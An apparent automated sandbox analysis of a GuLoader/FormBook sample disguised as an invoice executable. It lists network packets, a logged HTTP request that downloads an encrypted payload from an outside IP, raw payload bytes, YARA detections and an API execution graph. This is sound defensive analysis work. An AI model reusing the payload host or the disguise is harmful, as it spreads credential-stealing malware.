                              Jan 10, 2025 07:13:14.211523056 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.211530924 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.211546898 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.211594105 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.233889103 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.233897924 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.233962059 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.246504068 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.246515036 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.246522903 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.246573925 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.246577978 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.246584892 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.246596098 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.246609926 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.246620893 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.246629953 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.246632099 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.246651888 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.246686935 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.246687889 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.246799946 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.246809006 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.246819973 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.246835947 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.246846914 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.246856928 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.246856928 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.246885061 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.246912003 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.247138977 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.247148991 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.247159004 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.247172117 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.247193098 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.247200012 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.247203112 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.247215033 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.247222900 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.247240067 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.247267962 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.247476101 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.247486115 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.247494936 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.247504950 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.247517109 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.247528076 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.247528076 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.247538090 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.247548103 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.247549057 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.247561932 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.247564077 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.247584105 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.247611046 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:54.555022955 CET4979680192.168.2.5212.162.149.153

                              HTTP Request Dependency Graph

                              • 212.162.149.153

                              HTTP Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.549796212.162.149.153804984C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
                              TimestampBytes transferredDirectionData
                              Jan 10, 2025 07:13:13.303292990 CET184OUTGET /iXjlIFhRzlkjbZPQm185.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                              Host: 212.162.149.153
                              Cache-Control: no-cache
                              Jan 10, 2025 07:13:13.846641064 CET1236INHTTP/1.1 200 OK
                              Content-Type: application/octet-stream
                              Last-Modified: Wed, 08 Jan 2025 10:34:20 GMT
                              Accept-Ranges: bytes
                              ETag: "baf81e0b861db1:0"
                              Server: Microsoft-IIS/8.5
                              Date: Fri, 10 Jan 2025 06:13:15 GMT
                              Content-Length: 287808
                              Data Raw: b5 7a 32 22 5e ed 4f 24 c4 b4 15 e6 fd 04 f7 13 f9 f0 8a c0 a0 e4 bd fc 30 f7 6e 7f 64 7f 48 e7 99 79 28 8a d2 b6 7f 6f 68 51 7f 36 97 69 29 3c 94 0b b9 f5 79 d7 d8 4c 37 2f ea a3 ba 9d b4 2c e2 1d 9b 63 ee c8 c8 1e 56 fc 49 a9 bc 01 3c b3 1d a1 24 82 b5 1d 2d e4 a0 8e c7 6d 47 21 a6 28 b8 54 73 85 d1 1d 20 50 e7 e3 6c 12 3f 20 c7 d4 07 94 34 87 17 94 82 e5 81 a5 14 e2 f1 5e 76 cc ee 24 49 a1 ee 03 85 c7 75 89 2f 75 89 34 b5 8a 2c 8e b5 74 87 0d 5f c3 0f 79 6c c2 ff fc 48 81 dc 41 b8 70 6c 26 b7 cd 81 a1 4a 9e 89 24 c7 69 68 a1 dc 64 0e 3c 24 77 79 4a fc 77 f3 a7 40 7c 03 df e4 c6 eb e1 f0 fb 57 6f 28 41 0d 7c f5 b4 d3 18 cc 09 77 90 c2 69 8f e7 d7 1a 2f ea d4 b5 29 93 3a 38 95 4f d2 67 13 58 c0 ad 87 88 96 29 9a 7f ea 97 94 2d d5 a5 c2 09 59 88 52 34 7a ce d2 e5 b2 4b 66 1a c0 6a 51 05 be 74 9a 84 f4 b4 fe 37 b4 b1 4b ee 2e 64 23 b2 6a 01 c8 a5 9f 17 7a a8 44 e8 89 70 a0 c3 05 a6 dd 2b 73 38 47 7a ad 44 0a 13 1e 95 9e d8 45 fc a7 8b 6d 1f 38 23 62 c7 78 2d f0 b4 69 55 1c 2a c9 25 06 41 91 66 de 8b [TRUNCATED]
                              Data Ascii: z2"^O$0ndHy(ohQ6i)<yL7/,cVI<$-mG!(Ts Pl? 4^v$Iu/u4,t_ylHApl&J$ihd<$wyJw@|Wo(A|wi/):8OgX)-YR4zKfjQt7K.d#jzDp+s8GzDEm8#bx-iU*%Af|=xd<Y"YKN}i[Wpd1(/%|E{1HitL$m+[>}Vk}u;xmfZ2`eW%L?GLjX~Xv,P^[{ v?8uV_wMM"o@2Q9S<i5?Q|u+M3MZlIa`K@YSGs/N$]v=[F2m%}DQhYx6(IEKY_~]C+O#{dB<Z*Ii_68}=B y&=Kg{W~(@Z^5pt`9/)tk;2LB@u>`08oyU0HrdBxbWDYhu7TocbDK++4h']5AFc?;2[I'Ha6!{{]S8GIepj?cD]0nm\J?&P:UJo/p'V?
                              Jan 10, 2025 07:13:13.846652031 CET1236INData Raw: e0 ec 79 af 07 e0 46 0e 50 4a d8 66 81 e2 31 d2 10 32 e2 5d f1 ed f9 9a 2d 6b df 59 cf a9 e6 91 d1 7e 3b e9 ed 7f a8 3e e1 d6 ac 78 72 0a d8 00 57 89 96 1c 0e d6 c7 3a db 9e 46 f1 33 5a e1 96 b4 90 aa 78 93 67 69 3d 09 30 54 6b f7 00 c2 71 d2 a9
                              Data Ascii: yFPJf12]-kY~;>xrW:F3Zxgi=0Tkq\R^{'BvIN~Fr:q~V0&}w}nLgAH~2mNW!Fcex^lbYx8:X~x UHf=gVU~Z<zflm_VYmoSa9`0=
                              Jan 10, 2025 07:13:13.846662045 CET1236INData Raw: 0e 37 85 e2 54 6f 63 16 c0 62 44 aa a2 db cb e9 4b d1 2b b0 1c 88 bf f8 be e6 d9 12 2b 18 c8 82 ca 99 a7 34 c9 c0 e9 cb 68 0c 27 5d c2 8e 35 00 41 b7 08 16 46 fb 63 3f 3b 10 32 5b 92 49 27 48 8d f6 ef 61 81 c4 92 1d fa f1 f9 e4 07 9f 36 21 ea 7b
                              Data Ascii: 7TocbDK++4h']5AFc?;2[I'Ha6!{{]S8GIepj?cD]0nm\J?&P:UJo/p'V?yFPJf12]-kY~;>xrW:F3Zxgi=0Tkq
                              Jan 10, 2025 07:13:13.846671104 CET1236INData Raw: 14 c3 c3 e5 16 64 da 42 ea 3c 5a d3 2a 49 69 5f 36 a3 38 7d 3d 42 20 c7 fb bd ed c1 82 79 26 19 f8 e3 3d 0a a2 e4 4b b0 67 89 d3 7b c2 57 9a d6 7e 9a 0f 28 40 15 1e 5a c5 bd 1d db 5e b9 35 ff 8d 03 f9 70 99 14 99 06 74 1d ff 60 96 e6 39 b5 db 04
                              Data Ascii: dB<Z*Ii_68}=B y&=Kg{W~(@Z^5pt`9/)tk;2LB@u>`08oyU0HrdBxbWDYhu7TocbDK++4h']5AFc?;2[I'Ha6!{
                              Jan 10, 2025 07:13:13.846679926 CET896INData Raw: a6 e2 7f dc b4 b9 8f 77 4d f6 b7 4a 40 32 06 91 a1 b1 5e 44 68 b6 a6 b2 de a9 09 b7 b3 f4 7c 20 a5 8b cb 08 c5 b9 f3 19 b8 ae 89 08 ef 2b f6 13 9c 87 98 53 ce ae 33 4d 1f 2f 6e b9 20 8b 28 15 bc 83 05 ed 3c 32 35 1d 53 de 1a 78 e8 ad ff 0a 2f bd
                              Data Ascii: wMJ@2^Dh| +S3M/n (<25Sx/~C-aNu"X0m,}DMhY#x6MMao,kXoKKcH3R$L?F|"*sd+Z_"fd}Q5H<o?Df"gZ4eAo(Z4^p=hA
                              Jan 10, 2025 07:13:13.884083033 CET1236INData Raw: 31 c8 b7 f0 d4 0e 4e 6c 32 c0 dc d5 d8 75 56 68 11 e3 eb 65 6e 97 66 16 dc 90 e7 62 95 4f 66 85 6e e1 71 41 9d f7 6f 65 6f d9 38 a9 e6 56 79 7f 70 8e 5d bc c5 ff af dd 6f ed c8 4b da 12 75 0c 45 00 75 ff 96 a6 a1 24 02 cc 18 65 67 28 72 87 18 46
                              Data Ascii: 1Nl2uVhenfbOfnqAoeo8Vyp]oKuEu$eg(rFb'Asl4cF@K+AeP&2RNA(rWLTGc{{-{@|f3,jOI;.hTb^j4Vo1-%hk(w_
                              Jan 10, 2025 07:13:13.884095907 CET1236INData Raw: a3 c1 3b 8b ce d3 9c 6a ad 19 a0 c9 2f f8 1a 0c 03 b2 2a 24 cb 68 05 26 7c 1c 93 d4 39 35 bb 7b d7 22 a7 c8 08 d8 87 e0 5e 50 bf 8f 23 7d 08 5e a6 9d 89 32 c7 d9 9e f9 cc 1e e6 24 80 7f 2a 43 e5 13 e1 9a 77 4e 41 b6 82 54 bd 4b 2a 48 36 64 e0 bd
                              Data Ascii: ;j/*$h&|95{"^P#}^2$*CwNATK*H6d6qOA>3<K8=_>~)$-G!<OCa}0qY>r7yM8Nz-GOY'gt<LW"t3ODcB?bd["D~
                              Jan 10, 2025 07:13:13.884107113 CET1236INData Raw: ef f1 49 65 bf c3 be fb 47 5d 50 cd 65 1c c7 b3 4d c4 57 e2 11 3f a0 1d 80 22 1a cd 7e 02 75 81 23 90 d7 e3 cc 20 54 da db 38 41 2e 90 07 e8 b9 69 b6 09 4b cb 54 04 43 28 a5 28 58 2d c1 6d 61 64 8b 63 65 8f fb 68 62 0c 48 b8 0d 02 39 18 37 15 f9
                              Data Ascii: IeG]PeMW?"~u# T8A.iKTC((X-madcehbH97?t}5?%#6dC=Bh(3q:idPObCe\xVnukZniQ])3:KeRNq\})xSoHQDgLetZB]cBDHt
                              Jan 10, 2025 07:13:13.884115934 CET1236INData Raw: cf 97 47 b1 13 c2 20 8c e1 bc 04 d8 db a4 c9 fc 23 af c1 98 6f fb 16 6d a3 31 75 0c b9 a1 bb 3b 7d eb eb 2f 52 c9 5d 2c ea 99 0b 53 d1 02 de 44 56 b1 af 7f eb a3 49 95 6a 69 c1 71 20 b0 7c 65 b3 b0 61 11 48 c7 6b a1 8d a0 b0 e4 36 85 5c cb db 2b
                              Data Ascii: G #om1u;}/R],SDVIjiq |eaHk6\+.R_Dh4# 'PpOUeKA:'3Z^:W6 hM]R2W~FIVrfW^-0?F.nL@ceZWT:Rpu8Lsbwb
                              Jan 10, 2025 07:13:13.884126902 CET1236INData Raw: 12 15 f4 8b b7 da cd 38 e1 35 a4 b8 71 b6 e6 75 c0 8a 10 10 f4 24 c0 9f cf 37 be 77 5a c1 a8 cf 14 6f aa ee e1 fe a0 67 ba 83 14 97 e0 39 78 84 92 1b 5f ef 9e 45 b2 5d bb 7d a4 dc 14 d9 af 04 97 3d bc 11 d2 f1 f9 de 44 18 52 e4 a9 d7 29 7d 47 60
                              Data Ascii: 85qu$7wZog9x_E]}=DR)}G`6_Nw7|]'}#r>4'\I6Fv?;2z.OH>rr|0Xd8`SPsyN>ZkyRe8J+&qKlEd-I`y,({c
                              Jan 10, 2025 07:13:13.884136915 CET1236INData Raw: 55 26 a1 89 04 1c 19 5a ca 8a af 29 ce 4d aa 12 05 e7 7d fd dd d0 ad 4e e9 9f de 00 78 36 9a 1f b8 71 d7 23 ca 81 dc 01 83 89 ac 98 59 50 c8 ce 8f 18 4f 59 14 b8 d3 e2 e5 56 bc 0c c3 4f a6 fc 0e fc e4 7b 43 08 94 bd df e5 63 39 51 0c 9a fb 1f db
                              Data Ascii: U&Z)M}Nx6q#YPOYVO{Cc9Q*V17*{D<.s5J;7VEjO4\avK=h /mR(2set8SNZ`O0>PK\rcVq_u|y#m]


                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              Behavior

                              Click to jump to process

                              System Behavior

                              General

                              Target ID:0
                              Start time:01:12:38
                              Start date:10/01/2025
                              Path:C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe"
                              Imagebase:0x400000
                              File size:533'960 bytes
                              MD5 hash:4F2C796AEBD02A54CA9BEBB0C5BC5EF0
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2338207417.0000000004B8E000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true

                              General

                              Target ID:3
                              Start time:01:13:09
                              Start date:10/01/2025
                              Path:C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe"
                              Imagebase:0x400000
                              File size:533'960 bytes
                              MD5 hash:4F2C796AEBD02A54CA9BEBB0C5BC5EF0
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2776555713.0000000032150000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true

                              Disassembly

                              Reset < >

                                Execution Graph

                                Execution Coverage:23.6%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:19.6%
                                Total number of Nodes:1565
                                Total number of Limit Nodes:40
                                execution_graph 4929 401c41 4930 403002 17 API calls 4929->4930 4931 401c4a 4930->4931 4932 403002 17 API calls 4931->4932 4934 401c53 4932->4934 4936 4065fa wsprintfW 4934->4936 4935 401cdb 4936->4935 4937 4024c2 4938 40303e 17 API calls 4937->4938 4939 4024c8 4938->4939 4940 40303e 17 API calls 4939->4940 4941 4024d1 4940->4941 4942 40303e 17 API calls 4941->4942 4943 4024da 4942->4943 4944 4065aa 2 API calls 4943->4944 4945 4024e2 4944->4945 4946 4024f3 lstrlenW lstrlenW 4945->4946 4947 405d15 24 API calls 4945->4947 4950 402ea1 4945->4950 4948 405d15 24 API calls 4946->4948 4947->4945 4949 40253a SHFileOperationW 4948->4949 4949->4945 4949->4950 4951 402b42 4952 402b48 4951->4952 4953 402b50 FindNextFileW 4952->4953 4954 4018be 4952->4954 4953->4954 4955 6fa41aa7 4961 6fa4156c 4955->4961 4957 6fa41b01 GlobalFree 4958 6fa41abf 4958->4957 4959 6fa41add 4958->4959 4960 6fa41aed VirtualFree 4958->4960 4959->4957 4960->4957 4963 6fa41572 4961->4963 4962 6fa41578 4962->4958 4963->4962 4964 6fa41584 GlobalFree 4963->4964 4964->4958 4965 404ec7 4966 404ed7 4965->4966 4967 404efd 4965->4967 4968 4054f5 18 API calls 4966->4968 4969 405736 8 API calls 4967->4969 4970 404ee4 SetDlgItemTextW 4968->4970 4971 404f09 4969->4971 4970->4967 3863 402048 3871 403002 3863->3871 3865 40204e 3866 403002 17 API calls 3865->3866 3867 402057 3866->3867 3868 402061 ShowWindow 3867->3868 3869 40206c EnableWindow 3867->3869 3870 402ea1 3868->3870 3869->3870 3872 405e95 17 API calls 3871->3872 3873 403016 3872->3873 3873->3865 4972 401ecc 4973 403002 17 API calls 4972->4973 4974 401eda SetWindowLongW 4973->4974 4975 402ea1 4974->4975 4320 40234f 4321 40303e 17 API calls 4320->4321 4322 402356 4321->4322 4323 40303e 17 API calls 4322->4323 4324 402361 4323->4324 4325 40303e 17 API calls 4324->4325 4326 40236e 4325->4326 4327 40303e 17 API calls 4326->4327 4328 402379 4327->4328 4329 40303e 17 API calls 4328->4329 4331 402384 4329->4331 4330 4023c4 CoCreateInstance 4335 4023e8 4330->4335 4331->4330 4332 40303e 17 API calls 4331->4332 4332->4330 4333 405d15 24 API calls 4334 4024ba 4333->4334 4335->4333 4976 402dd1 4977 402dd9 4976->4977 4987 402df2 4976->4987 4980 403002 17 API calls 4977->4980 4984 402e72 4977->4984 4978 4068c1 5 API calls 4979 402e2a 4978->4979 4981 40303e 17 API calls 4979->4981 4982 402de9 4980->4982 4983 402e33 4981->4983 4985 403002 17 API calls 4982->4985 4983->4984 4986 402e37 IIDFromString 4983->4986 4985->4987 4986->4984 4988 402e47 4986->4988 4987->4978 4988->4984 4991 406af5 lstrcpynW 4988->4991 4990 402e66 CoTaskMemFree 4990->4984 4991->4990 4359 402656 4360 40303e 17 API calls 4359->4360 4361 40266d 4360->4361 4362 40303e 17 API calls 4361->4362 4363 402678 4362->4363 4378 406280 4363->4378 4366 402ea5 4367 4026d1 4370 4026d8 4367->4370 4374 4026e7 4367->4374 4368 4026bb 4369 40303e 17 API calls 4368->4369 4371 4026c2 lstrlenW 4369->4371 4372 403002 17 API calls 4370->4372 4373 402700 RegSetValueExW 4371->4373 4376 4026df 4372->4376 4375 40271c RegCloseKey 4373->4375 4374->4373 4377 403148 35 API calls 4374->4377 4375->4366 4376->4373 4377->4376 4379 40628f 4378->4379 4380 402697 4379->4380 4381 406298 RegCreateKeyExW 4379->4381 4380->4366 4380->4367 4380->4368 4381->4380 4382 4036d7 SetErrorMode GetVersionExW 4383 403722 GetVersionExW 4382->4383 4385 403759 4382->4385 4384 403744 4383->4384 4384->4385 4386 4037c0 4385->4386 4387 4068c1 5 API calls 4385->4387 4388 406179 3 API calls 4386->4388 4387->4386 4389 4037d6 lstrlenA 4388->4389 4389->4386 4390 4037e4 4389->4390 4391 4068c1 5 API calls 4390->4391 4392 4037eb 4391->4392 4393 4068c1 5 API calls 4392->4393 4394 4037f2 4393->4394 4395 4068c1 5 API calls 4394->4395 4396 4037fe #17 OleInitialize SHGetFileInfoW 4395->4396 4472 406af5 lstrcpynW 4396->4472 4399 40384c GetCommandLineW 4473 406af5 lstrcpynW 4399->4473 4401 40385d 4402 4065d1 CharNextW 4401->4402 4403 403897 CharNextW 4402->4403 4404 403985 GetTempPathW 4403->4404 4414 4038b0 4403->4414 4474 403c80 4404->4474 4406 40399d 4407 4039a1 GetWindowsDirectoryW lstrcatW 4406->4407 4408 4039f7 DeleteFileW 4406->4408 4410 403c80 12 API calls 4407->4410 4484 4033c8 GetTickCount GetModuleFileNameW 4408->4484 4411 4039bd 4410->4411 4411->4408 4415 4039c1 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4411->4415 4412 4065d1 CharNextW 4412->4414 4413 403a0a 4420 4065d1 CharNextW 4413->4420 4423 403a8d 4413->4423 4457 403a7f 4413->4457 4414->4404 4414->4412 4418 403971 4414->4418 4416 403c80 12 API calls 4415->4416 4417 4039ef 4416->4417 4417->4408 4417->4423 4569 406af5 lstrcpynW 4418->4569 4427 403a29 4420->4427 4591 4036ad 4423->4591 4425 403bd4 4428 406a83 MessageBoxIndirectW 4425->4428 4426 403be7 4429 403bf0 GetCurrentProcess OpenProcessToken 4426->4429 4430 403bdf ExitProcess 4426->4430 4431 403a53 4427->4431 4432 403a94 4427->4432 4428->4430 4434 403c08 LookupPrivilegeValueW AdjustTokenPrivileges 4429->4434 4435 403c3c 4429->4435 4570 406613 4431->4570 4438 4064d7 5 API calls 4432->4438 4434->4435 4437 4068c1 5 API calls 4435->4437 4440 403c43 4437->4440 4441 403a99 lstrcatW 4438->4441 4442 403c58 ExitWindowsEx 4440->4442 4447 403c65 4440->4447 4443 403abd lstrcatW lstrcmpiW 4441->4443 4444 403aae lstrcatW 4441->4444 4442->4430 4442->4447 4443->4423 4445 403ae4 4443->4445 4444->4443 4449 403af4 4445->4449 4450 403aed 4445->4450 4448 401533 94 API calls 4447->4448 4448->4430 4453 405df9 2 API calls 4449->4453 4452 405e19 4 API calls 4450->4452 4451 403a74 4585 406af5 lstrcpynW 4451->4585 4455 403af2 4452->4455 4456 403af9 SetCurrentDirectoryW 4453->4456 4455->4456 4458 403b1c 4456->4458 4459 403b0d 4456->4459 4512 405a19 4457->4512 4587 406af5 lstrcpynW 4458->4587 4586 406af5 lstrcpynW 4459->4586 4462 405e95 17 API calls 4463 403b4c DeleteFileW 4462->4463 4464 403b57 CopyFileW 4463->4464 4469 403b2a 4463->4469 4464->4469 4465 403bb0 4467 406218 35 API calls 4465->4467 4466 406218 35 API calls 4466->4469 4467->4423 4468 405e95 17 API calls 4468->4469 4469->4462 4469->4465 4469->4466 4469->4468 4471 403b9b CloseHandle 4469->4471 4588 4066b1 CreateProcessW 4469->4588 4471->4469 4472->4399 4473->4401 4475 406d18 5 API calls 4474->4475 4476 403c8c 4475->4476 4477 403c96 4476->4477 4478 406531 3 API calls 4476->4478 4477->4406 4479 403c9e 4478->4479 4480 405df9 2 API calls 4479->4480 4481 403ca4 4480->4481 4482 406a31 2 API calls 4481->4482 4483 403caf 4482->4483 4483->4406 4598 4068f6 GetFileAttributesW CreateFileW 4484->4598 4486 40340a 4487 403417 4486->4487 4599 406af5 lstrcpynW 4486->4599 4487->4413 4489 40342d 4600 406ceb lstrlenW 4489->4600 4493 40343e GetFileSize 4494 403457 4493->4494 4508 403545 4493->4508 4494->4487 4497 40311b ReadFile 4494->4497 4499 403613 4494->4499 4507 403364 6 API calls 4494->4507 4494->4508 4496 403554 4496->4487 4498 403595 GlobalAlloc 4496->4498 4616 403131 SetFilePointer 4496->4616 4497->4494 4617 403131 SetFilePointer 4498->4617 4501 403364 6 API calls 4499->4501 4501->4487 4503 403571 4506 406923 ReadFile 4503->4506 4504 4035b2 4505 403148 35 API calls 4504->4505 4510 4035c1 4505->4510 4509 403583 4506->4509 4507->4494 4605 403364 4508->4605 4509->4487 4509->4498 4510->4487 4510->4510 4511 4035f1 SetFilePointer 4510->4511 4511->4487 4513 4068c1 5 API calls 4512->4513 4514 405a2d 4513->4514 4515 405a36 4514->4515 4516 405a48 4514->4516 4630 4065fa wsprintfW 4515->4630 4517 406952 3 API calls 4516->4517 4518 405a77 4517->4518 4520 405a96 lstrcatW 4518->4520 4522 406952 3 API calls 4518->4522 4521 405a46 4520->4521 4622 40595a 4521->4622 4522->4520 4525 406613 18 API calls 4527 405ac8 4525->4527 4526 405b62 4528 406613 18 API calls 4526->4528 4527->4526 4529 406952 3 API calls 4527->4529 4530 405b68 4528->4530 4531 405afb 4529->4531 4532 405b78 LoadImageW 4530->4532 4533 405e95 17 API calls 4530->4533 4531->4526 4537 405b1f lstrlenW 4531->4537 4540 4065d1 CharNextW 4531->4540 4534 405c25 4532->4534 4535 405ba8 RegisterClassW 4532->4535 4533->4532 4536 401533 94 API calls 4534->4536 4538 405bdc SystemParametersInfoW CreateWindowExW 4535->4538 4568 405bd5 4535->4568 4539 405c2b 4536->4539 4541 405b55 4537->4541 4542 405b2f lstrcmpiW 4537->4542 4538->4534 4547 40595a 18 API calls 4539->4547 4539->4568 4545 405b1a 4540->4545 4544 406531 3 API calls 4541->4544 4542->4541 4543 405b3f GetFileAttributesW 4542->4543 4546 405b4b 4543->4546 4548 405b5b 4544->4548 4545->4537 4546->4541 4549 406ceb 2 API calls 4546->4549 4550 405c38 4547->4550 4631 406af5 lstrcpynW 4548->4631 4549->4541 4552 405c44 ShowWindow 4550->4552 4553 405cc6 4550->4553 4555 406179 3 API calls 4552->4555 4554 40583f 97 API calls 4553->4554 4556 405ccc 4554->4556 4557 405c5c 4555->4557 4558 405cd0 4556->4558 4559 405cea 4556->4559 4560 405c6a GetClassInfoW 4557->4560 4561 406179 3 API calls 4557->4561 4565 401533 94 API calls 4558->4565 4558->4568 4562 401533 94 API calls 4559->4562 4563 405c93 DialogBoxParamW 4560->4563 4564 405c7d GetClassInfoW RegisterClassW 4560->4564 4561->4560 4566 405cf1 4562->4566 4567 401533 94 API calls 4563->4567 4564->4563 4565->4568 4566->4566 4567->4568 4568->4423 4569->4404 4633 406af5 lstrcpynW 4570->4633 4572 406624 4573 406ba0 4 API calls 4572->4573 4574 40662a 4573->4574 4575 406d18 5 API calls 4574->4575 4582 403a61 4574->4582 4580 406636 4575->4580 4576 406666 lstrlenW 4577 406672 4576->4577 4576->4580 4579 406531 3 API calls 4577->4579 4578 4065aa 2 API calls 4578->4580 4581 406677 GetFileAttributesW 4579->4581 4580->4576 4580->4578 4580->4582 4583 406ceb 2 API calls 4580->4583 4581->4582 4582->4423 4584 406af5 lstrcpynW 4582->4584 4583->4576 4584->4451 4585->4457 4586->4458 4587->4469 4589 4066f0 4588->4589 4590 4066e4 CloseHandle 4588->4590 4589->4469 4590->4589 4592 4036c5 4591->4592 4593 4036b7 CloseHandle 4591->4593 4634 403cee 4592->4634 4593->4592 4598->4486 4599->4489 4601 406cfa 4600->4601 4602 406d00 CharPrevW 4601->4602 4603 403433 4601->4603 4602->4601 4602->4603 4604 406af5 lstrcpynW 4603->4604 4604->4493 4606 403383 4605->4606 4607 40336b 4605->4607 4610 403394 GetTickCount 4606->4610 4611 40338c 4606->4611 4608 403374 DestroyWindow 4607->4608 4609 40337b 4607->4609 4608->4609 4609->4496 4612 4033a2 CreateDialogParamW ShowWindow 4610->4612 4613 4033c7 4610->4613 4618 4061ea 4611->4618 4612->4613 4613->4496 4616->4503 4617->4504 4619 4061fc PeekMessageW 4618->4619 4620 4061f2 DispatchMessageW 4619->4620 4621 403393 4619->4621 4620->4619 4621->4496 4623 40596d 4622->4623 4632 4065fa wsprintfW 4623->4632 4625 4059e6 4626 405cf6 18 API calls 4625->4626 4628 4059eb 4626->4628 4627 405a14 4627->4525 4628->4627 4629 405e95 17 API calls 4628->4629 4629->4628 4630->4521 4631->4526 4632->4625 4633->4572 4635 403cfc 4634->4635 4636 4036ca 4635->4636 4637 403d01 FreeLibrary GlobalFree 4635->4637 4638 4066f4 4636->4638 4637->4636 4637->4637 4639 406613 18 API calls 4638->4639 4640 406716 4639->4640 4641 406736 4640->4641 4642 40671f DeleteFileW 4640->4642 4643 4036d6 OleUninitialize 4641->4643 4645 406856 4641->4645 4677 406af5 lstrcpynW 4641->4677 4642->4643 4643->4425 4643->4426 4645->4643 4649 4065aa 2 API calls 4645->4649 4646 40675e 4647 406776 4646->4647 4648 406768 lstrcatW 4646->4648 4651 406ceb 2 API calls 4647->4651 4650 40677c 4648->4650 4652 406873 4649->4652 4653 40678d lstrcatW 4650->4653 4655 406795 lstrlenW FindFirstFileW 4650->4655 4651->4650 4652->4643 4654 406877 4652->4654 4653->4655 4656 406531 3 API calls 4654->4656 4655->4645 4664 4067be 4655->4664 4657 40687d 4656->4657 4658 406560 5 API calls 4657->4658 4659 406889 4658->4659 4661 4068ac 4659->4661 4662 40688d 4659->4662 4660 406838 FindNextFileW 4660->4664 4665 40684f FindClose 4660->4665 4666 405d15 24 API calls 4661->4666 4662->4643 4667 405d15 24 API calls 4662->4667 4664->4660 4671 4066f4 59 API calls 4664->4671 